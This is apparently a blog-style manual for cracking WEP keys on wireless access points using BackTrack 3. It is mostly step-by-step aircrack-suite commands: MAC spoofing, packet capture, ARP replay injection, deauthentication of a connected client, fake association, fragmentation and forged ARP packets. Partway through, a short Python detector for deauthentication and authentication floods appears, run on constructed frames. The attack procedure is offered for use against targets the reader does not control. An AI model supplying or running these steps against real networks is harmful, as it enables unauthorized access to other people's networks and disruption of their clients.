JonsenElizee


BT3 Crack WEP WPA Manual

0. Make a bootable USB

Format the USB stick to FAT32 under Windows.

Mount bt3-usb.iso.

Copy the boot and BT3 folders onto the USB stick.

Run boot/bootinst.bat

OK.

Log into the BT3 system (KDE)

User: root

Pwd: toor

OK? If not, try this.

#startx

OK? If still not, try this.

#xconfig

#startx

Note

If a command does not return immediately, just open a new shell and run the next command there.

WNC: wireless net card, i.e. your own wireless adapter.

AP: access point, the target.

1. CRACK OPEN WEP WITH VALID CLIENT ARP

Precondition

The AP uses WEP encryption.

The AP uses Open System authentication (open mode).

The AP has a valid (associated) client.

The AP client only generates valid ARP traffic.

Turn on the wireless switch of your laptop.

Step1. Unload the iwl3945 driver of the Intel 3945 wireless net card (WNC).

#modprobe -r iwl3945

Step2. Load a monitor-capable WNC driver for the Intel 3945. Different WNCs have different loading procedures.

#modprobe ipwraw

#airmon-ng

#modinfo ipwraw

Step3. Search for the AP. Once you have the info (ESSID, MAC, whether it has a client, client MAC), press Ctrl+C to stop the scan.

#airodump-ng wifi0

Suppose we get an AP as follows:

AP MAC: 00:00:00:00:00:00
AP ESSID: tenda
AP Channel: 11
AP Client MAC: CC:CC:CC:CC:CC:CC

Step4. Optional. For safety, change your own WNC MAC address, e.g. to 11:11:11:11:11:11.

#macchanger -m 11:11:11:11:11:11 wifi0

Step5. Activate wifi0 and put it on the AP's channel.

#airmon-ng start wifi0 11

Optional. Show the working mode and channel of wifi0.

#iwconfig wifi0

Optional. Test the injection ability of your WNC.

#aireplay-ng -9 wifi0

Step6. Now crack the AP's key.

#wesside-ng -i wifi0 -v 00:00:00:00:00:00

2. CRACK OPEN WEP WITH LOTS OF VALID CLIENT IVS DATA

Precondition

The AP uses WEP encryption.

The AP uses Open System authentication (open mode).

The AP has a valid (associated) client.

The AP client generates plenty of valid traffic.

We can collect lots of IVs from the AP client's traffic.

Turn on the wireless switch of your laptop.

Step1. Unload the iwl3945 driver of the Intel 3945 wireless net card (WNC).

#modprobe -r iwl3945

Step2. Load a monitor-capable WNC driver for the Intel 3945. Different WNCs have different loading procedures.

#modprobe ipwraw

#airmon-ng

#modinfo ipwraw

Step3. Search for the AP. Once you have the info (ESSID, MAC, whether it has a client, client MAC), press Ctrl+C to stop the scan.

#airodump-ng wifi0

Suppose we get an AP as follows:

AP MAC: 00:00:00:00:00:00
AP ESSID: tenda
AP Channel: 11
AP Client MAC: CC:CC:CC:CC:CC:CC

Step4. For safety, change your own WNC MAC address, e.g. to 11:11:11:11:11:11.

#macchanger -m 11:11:11:11:11:11 wifi0

Step5. Activate wifi0 and put it on the AP's channel.

#airmon-ng start wifi0 11

Show the working mode and channel of wifi0.

#iwconfig wifi0

Test the injection ability of your WNC.

#aireplay-ng -9 wifi0

Step6. Capture an IVs data file (-w <data file name>, -c <channel>).

#airodump-ng --ivs -w dumped_data -c 11 wifi0

Step7. Now crack the AP's key.

#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs

3. CRACK OPEN WEP WITH LESS VALID CLIENT IVS DATA

Precondition

The AP uses WEP encryption.

The AP uses Open System authentication (open mode).

The AP has a valid (associated) client.

The AP client generates only a little valid traffic, so few IVs can be collected.

Turn on the wireless switch of your laptop.

Step1. Unload the iwl3945 driver of the Intel 3945 wireless net card (WNC).

#modprobe -r iwl3945

Step2. Load a monitor-capable WNC driver for the Intel 3945. Different WNCs have different loading procedures.

#modprobe ipwraw

#airmon-ng

#modinfo ipwraw

Step3. Search for the AP. Once you have the info (ESSID, MAC, whether it has a client, client MAC), press Ctrl+C to stop the scan.

#airodump-ng wifi0

Suppose we get an AP as follows:

AP MAC: 00:00:00:00:00:00
AP ESSID: tenda
AP Channel: 11
AP Client MAC: CC:CC:CC:CC:CC:CC

Step4. For safety, change your own WNC MAC address, e.g. to 11:11:11:11:11:11.

#macchanger -m 11:11:11:11:11:11 wifi0

Step5. Activate wifi0 and put it on the AP's channel.

#airmon-ng start wifi0 11

Show the working mode and channel of wifi0.

#iwconfig wifi0

Test the injection ability of your WNC.

#aireplay-ng -9 wifi0

Step6. Capture an IVs data file (-w <data file name>, -c <channel>).

#airodump-ng --ivs -w dumped_data -c 11 wifi0

Step7. Use ARP replay injection to collect lots of IVs. This step may wait a long time for an ARP packet. You could use another PC or laptop to connect to the AP and produce an ARP packet.

#aireplay-ng -3 -b 00:00:00:00:00:00 -h CC:CC:CC:CC:CC:CC wifi0

Step8. Now crack the AP's key.

#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs

4. CRACK OPEN WEP WITH VALID CLIENT BUT NO COMMUNICATION

Precondition

The AP uses WEP encryption.

The AP uses Open System authentication (open mode).

The AP has a valid (associated) client.

The AP client does not communicate with the AP.

Turn on the wireless switch of your laptop.

Step1. Unload the iwl3945 driver of the Intel 3945 wireless net card (WNC).

#modprobe -r iwl3945

Step2. Load a monitor-capable WNC driver for the Intel 3945. Different WNCs have different loading procedures.

#modprobe ipwraw

#airmon-ng

#modinfo ipwraw

Step3. Search for the AP. Once you have the info (ESSID, MAC, whether it has a client, client MAC), press Ctrl+C to stop the scan.

#airodump-ng wifi0

Suppose we get an AP as follows:

AP MAC: 00:00:00:00:00:00
AP ESSID: tenda
AP Channel: 11
AP Client MAC: CC:CC:CC:CC:CC:CC

Step4. For safety, change your own WNC MAC address, e.g. to 11:11:11:11:11:11.

#macchanger -m 11:11:11:11:11:11 wifi0

Step5. Activate wifi0 and put it on the AP's channel.

#airmon-ng start wifi0 11

Show the working mode and channel of wifi0.

#iwconfig wifi0

Test the injection ability of your WNC.

#aireplay-ng -9 wifi0

Step6. Capture an IVs data file (-w <data file name>, -c <channel>).

#airodump-ng --ivs -w dumped_data -c 11 wifi0

Step7. Use the -0 deauthentication mode to force the AP and its client to disconnect, so that they reconnect.

#aireplay-ng -0 10 -a 00:00:00:00:00:00 -c CC:CC:CC:CC:CC:CC wifi0

Step8. Use the reconnection traffic from Step7 to perform ARP replay injection.

#aireplay-ng -3 -b 00:00:00:00:00:00 -h CC:CC:CC:CC:CC:CC wifi0

5. CRACK OPEN WEP WITH OUT CLIENT

Precondition

The AP uses WEP encryption.

The AP uses Open System authentication (open mode).

The AP has no associated client, so there is no client traffic to capture.

Turn on the wireless switch of your laptop.

Step1. Unload the iwl3945 driver of the Intel 3945 wireless net card (WNC).

#modprobe -r iwl3945

Step2. Load a monitor-capable WNC driver for the Intel 3945. Different WNCs have different loading procedures.

#modprobe ipwraw

#airmon-ng

#modinfo ipwraw

Step3. Search for the AP. Once you have the info (ESSID, MAC, whether it has a client, client MAC), press Ctrl+C to stop the scan.

#airodump-ng wifi0

Suppose we get an AP as follows:

AP MAC: 00:00:00:00:00:00
AP ESSID: tenda
AP Channel: 11
AP Client MAC: CC:CC:CC:CC:CC:CC

Step4. For safety, change your own WNC MAC address, e.g. to 11:11:11:11:11:11.

#macchanger -m 11:11:11:11:11:11 wifi0

Step5. Activate wifi0 and put it on the AP's channel.

#airmon-ng start wifi0 11

Show the working mode and channel of wifi0.

#iwconfig wifi0

Test the injection ability of your WNC.

#aireplay-ng -9 wifi0

Step6. Capture an IVs data file (-w <data file name>, -c <channel>).

#airodump-ng --ivs -w dumped_data -c 11 wifi0

Step7. Since there is no AP client, we need to create a virtual connection to the AP: perform a fake association from your WNC to the AP.

#aireplay-ng -1 0 -e tenda -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0

Failure Reasons

The AP has a MAC filter.

The signal from the AP is weak.

The AP uses WPA encryption.

Mismatch between the WNC and the AP, e.g. a different working channel.

Try

Drop the -e tenda parameter.

Set a lower rate, e.g. #iwconfig wifi0 rate 2M

To confirm the virtual connection:

#tcpdump -n -e -s0 -vvv -i wifi0
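From the defender's side, the deauthentication burst of section 4 and the fake association above are both bursts of 802.11 management frames from one source, which a wireless IDS can flag. The following is an added example, not code from the original post: a minimal detector that parses the management-frame header (type/subtype, addr2, addr3) and alerts on a burst per source; the frames and timestamps are constructed in memory, and the MAC addresses are this page's placeholder values.

```python
import struct
from collections import defaultdict

DEAUTH, AUTH = 0x0C, 0x0B   # 802.11 management-frame subtypes: deauthentication, authentication

def parse_mgmt_frame(frame: bytes):
    """Return (subtype, source MAC, BSSID) for an 802.11 management frame, else None."""
    if len(frame) < 24:
        return None
    fc = frame[0]                      # frame control: bits 2-3 = type, bits 4-7 = subtype
    if (fc >> 2) & 0x3 != 0:           # type 0 = management
        return None
    return fc >> 4, frame[10:16].hex(":"), frame[16:22].hex(":")   # addr2 = source, addr3 = BSSID

def detect_floods(frames, window=10.0, threshold=5):
    """frames: iterable of (timestamp, raw frame). Report a source that sends
    `threshold` deauthentication or authentication frames for one BSSID within
    `window` seconds; the alert fires once per burst."""
    recent = defaultdict(list)
    alerts = []
    for ts, frame in frames:
        parsed = parse_mgmt_frame(frame)
        if parsed is None or parsed[0] not in (DEAUTH, AUTH):
            continue
        subtype, src, bssid = parsed
        key = (subtype, src, bssid)
        recent[key] = [t for t in recent[key] if ts - t <= window] + [ts]
        if len(recent[key]) == threshold:
            kind = "deauth-flood" if subtype == DEAUTH else "auth-flood"
            alerts.append((kind, src, bssid, ts))
    return alerts

def build_mgmt_frame(subtype, dst, src, bssid, body=b""):
    """Build a minimal management frame in memory; constructed test data only."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    header = bytes([subtype << 4, 0]) + b"\x00\x00"                        # frame control + duration
    return header + mac(dst) + mac(src) + mac(bssid) + b"\x00\x00" + body   # addr1-3, seq control, body

AP, CLIENT = "00:00:00:00:00:00", "cc:cc:cc:cc:cc:cc"   # placeholder MACs from this page

def demo_alerts():
    """Constructed capture: ten spoofed deauth frames (reason code 7) within one second,
    which is how an 'aireplay-ng -0 10' burst looks on the air, then one normal authentication."""
    deauth = build_mgmt_frame(DEAUTH, CLIENT, AP, AP, struct.pack("<H", 7))
    frames = [(0.1 * i, deauth) for i in range(10)]
    frames.append((5.0, build_mgmt_frame(AUTH, AP, CLIENT, AP, struct.pack("<HHH", 0, 1, 0))))
    return detect_floods(frames)

if __name__ == "__main__":
    for alert in demo_alerts():
        print(alert)
```

A real deployment would feed frames from a monitor-mode capture and whitelist the estate's own AP BSSIDs so that a legitimate AP disconnecting a client is not reported.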

There are three kinds of methods to continue the cracking work.

Case1

Step8. Use the -2 attack mode (interactive packet replay): it can capture a packet, extract it and inject it.

#aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0

Enter Y/y at the question "Use this packet ?" to launch the attack.

After collecting enough IVs, you can use aircrack-ng to crack the key.

Step9. Run aircrack-ng.

#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs

Case2

Step8. Obtain the xor (keystream) file that contains valid key material. The generated xor file name starts with "fragment".

#aireplay-ng -5 -b <ap mac> -h <my mac> wifi0

Step9. Using the xor file, create a fake ARP packet (-y xor_file, -w fake_arp_file).

#packetforge-ng -0 -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w myarp

Step10. Use the -2 attack mode with -r fake_arp_file and -x data_send_rate (less than 1024).

